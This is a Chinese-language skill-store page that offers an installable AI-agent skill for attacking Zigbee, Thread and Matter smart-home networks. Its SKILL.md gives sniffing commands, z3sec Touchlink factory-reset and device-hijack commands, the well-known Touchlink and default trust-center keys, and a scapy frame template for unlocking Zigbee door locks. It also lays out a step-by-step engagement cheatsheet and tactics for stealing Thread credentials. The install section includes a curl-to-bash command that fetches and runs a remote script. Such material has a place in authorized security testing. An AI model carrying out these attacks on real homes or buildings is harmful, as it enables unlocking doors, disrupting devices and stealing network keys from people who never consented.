‹ 首页

offensive-zigbee-thread-matter

@snailsploit · 收录于 1 周前 · 上游提交 2 个月前

Zigbee, Thread, and Matter mesh-protocol attack methodology — IEEE 802.15.4 sniffing with TI CC2531 / CC2540 / Sonoff Zigbee Dongle E, KillerBee toolkit, Touchlink commissioning abuse with the well-known transport key, replay/injection attacks, Zigbee Cluster Library command abuse for door locks and bulbs, Thread network credential theft, Matter commissioning chain analysis, and 6LoWPAN/IPv6 routing exploitation. Use when targeting smart-home or commercial mesh deployments, Zigbee-based door locks, lighting, or sensor networks.

适合你,如果需要对 Zigbee/Thread/Matter 协议进行安全评估

/ 下载安装
offensive-zigbee-thread-matter.skill双击,或拖进 Claude 桌面版 / Cowork,即完成安装↓ .skill↓ .zip
用别的 agent?下载 .zip 解压,把文件夹放进它的技能目录
Claude Code~/.claude/skills/(项目级 .claude/skills/)
Codex CLI~/.codex/skills/
Cursor自动读取上面两处目录
其他工具见其文档的「skills」目录;两个下载是同一份文件,只是名字不同
/ 通过 npx 安装 校验哈希
npx oh-my-skill add snailsploit/claude-red/offensive-zigbee-thread-matter
/ 通过 bash 安装
curl -fsSL https://oh-my-skill.com/install.sh | bash -s -- snailsploit/claude-red/offensive-zigbee-thread-matter
/ 已经装过?验证本机副本,不用重装
npx oh-my-skill verify snailsploit/claude-red/offensive-zigbee-thread-matter
安装目标可用 --agent / --scope 或 --to 明确指定;省略时只会在唯一已存在的 agent 目录上自动选择,零命中或多命中会停止并提示。content_hash 缺失或不一致均拒装。
2669GitHub stars
~1.2K上下文体积 · 单文件
镜像托管

怎么用

商店整理自技能原文 · 版本 aeb41ec · 表述以原文为准
它做什么

Claude 会指导你使用 KillerBee 等工具嗅探 Zigbee/Thread/Matter 网络、利用已知密钥进行 Touchlink 攻击、捕获网络密钥、重放或注入 ZCL 命令,以及窃取 Thread 凭证和分析 Matter 配网流程。

什么时候触发

当你想测试智能家居或商业网状网络的安全性,特别是针对 Zigbee 门锁、灯泡或传感器网络时。

装好后可以这样说
Claude 会提供 z3sec 工具的使用方法。
技能原文 SKILL.md作者撰写 · MIT · aeb41ec

Zigbee / Thread / Matter Attacks

802.15.4-based mesh protocols underpin most "smart home" devices. Zigbee is widely deployed and has well-known crypto-key-reuse issues; Thread (modern, IPv6-based) ships with stronger defaults; Matter unifies their commissioning model with stronger crypto but still has implementation pitfalls.

Quick Workflow
  1. Sniff target frequency (channels 11–26 in 2.4 GHz)
  2. Identify network coordinator and joining devices
  3. For Zigbee: try Touchlink commissioning with the well-known key
  4. Capture join-key exchange when devices commission
  5. Replay or inject ZCL/ZHA cluster commands

Hardware

| Adapter | Use | |---|---| | TI CC2531 USB stick | Cheap, works with Zigbee2MQTT, KillerBee | | TI CC2540 / CC2652 | Zigbee + Thread + BLE | | Sonoff Zigbee Dongle E (CC2652P) | Modern, well-supported | | ApiMote (KillerBee dev) | Multi-channel, scapy-dot15d4 | | HackRF + appropriate firmware | Lower-level RF flexibility |

Discovery + Sniffing
# KillerBee suite
zbstumbler -i 0                 # find Zigbee networks
zbid                            # ID coordinators
zbdump -c 11 -w zigbee.pcap     # dump channel 11 to pcap

# scapy-dot15d4 for crafted frames
python3
>>> from scapy.contrib.dot15d4 import *
>>> sniff(iface='/dev/ttyACM0', count=50)

In Wireshark with the dot15d4 + zbee_nwk dissectors, you'll see frame counters, network keys (if joined), and ZCL commands.

Touchlink Commissioning Abuse

Touchlink (used by Zigbee 3.0 commissioning, especially in lighting) uses a well-known transport key:

0x9F559A553B7A6B2C5C4FBB4E84956F3D

Many consumer Zigbee bulbs / strips accept Touchlink commissioning from any nearby radio with this key — joining them to your network or stealing them from theirs.

# z3sec — Zigbee 3 commissioning attack toolkit
git clone https://github.com/IoTsec/Z3sec
python z3sec_inter_pan.py --command "factory_reset_request" --device <addr>
python z3sec_inter_pan.py --command "join_network" --network <PANID>

Outcomes:

  • Factory-reset victim devices remotely (DoS / mass disrupt)
  • Steal lights / sensors into attacker network
  • Read network keys after joining device-to-network
Network Key Capture During Joins
# Capture coordinator + joining device exchange
zbdump -c <ch> -w join.pcap

# Decrypt if you obtain the trust center link key
# Older Zigbee 1.x networks used a default trust center link key:
# ZigBeeAlliance09
# Modern networks use device-specific install codes

Once you have the network key, all traffic on that mesh is decrypted in Wireshark.

ZCL / ZHA Cluster Command Abuse

Zigbee Cluster Library defines on/off/level/lock clusters. With network key, you can issue commands as any device:

# scapy-dot15d4 frame to unlock a door lock
from scapy.contrib.dot15d4 import *
from scapy.contrib.zigbee import *

frame = Dot15d4FCS()/Dot15d4Data()/ZigbeeNWK(...)/ZigbeeAppDataPayload(...)/ZCLDoorLock(...)
sendp(frame, iface='/dev/ttyACM0')

The same primitive opens locks, toggles switches, dims lights, or floods the network with control traffic.

Thread Specifics

Thread (used by Apple HomePod, Nest, Eero) uses 802.15.4 with IPv6 (6LoWPAN) and stronger commissioning crypto.

  • Network credential is a commissioner-distributed PSKc
  • Devices join with the commissioner present
  • Mesh commissioning protocol is over UDP/CoAP

Attack surface:

  • PSKc theft from commissioner devices (mobile app companion, Apple Home, Nest app)
  • Reusing a leaked credential to join target network
  • 6LoWPAN routing attacks (rank manipulation, sinkhole)
Matter Commissioning

Matter unifies Zigbee/Thread/Wi-Fi device onboarding under one commissioning model:

  • QR code or manual setup code grants commissioning permission
  • Bluetooth LE used for initial commissioning
  • Subsequent communication over Wi-Fi or Thread

Attack surface:

  • Setup-code reuse / replay if commissioning window not closed
  • BLE-MITM during initial commissioning (see offensive-bluetooth-ble)
  • Fabric-attestation flaws in early implementations
Detection
  • Coordinator may log unexpected device joins
  • Hub apps surface "new device" notifications — commonly ignored by users
  • Wireshark/Sonoff captures from defenders are rare — most environments don't monitor 802.15.4
Engagement Cheatsheet
# 1. Identify networks + channels
zbstumbler -i 0

# 2. Sniff target channel
zbdump -c <ch> -w cap.pcap
# Open in Wireshark with dot15d4/zigbee dissectors

# 3. Touchlink attack on consumer Zigbee 3.0 lighting
python z3sec_inter_pan.py --command "factory_reset_request" --target <addr>

# 4. Steal device into attacker network
python z3sec_inter_pan.py --command "join_network" --target <addr>

# 5. With network key, issue ZCL commands directly
# (custom scapy-dot15d4 + zbee_nwk frames)

# 6. For Thread: focus on commissioner / PSKc theft from companion apps

Key References
  • KillerBee: github.com/riverloopsec/killerbee
  • Z3sec: github.com/IoTsec/Z3sec
  • "Zigbee Insecurity" research (CON Black Hat talks)
  • Thread spec: threadgroup.org/support
  • Matter / CSA spec: csa-iot.org/all-solutions/matter
  • Source: https://github.com/SnailSploit/offensive-checklist/blob/main/wireless.md
按 MIT 许可原样转载,未经改动 · 在 GitHub 查看 →

评论

登录即可评论;带「已验证安装」的,是发布者名下有本店的安装或持有记录。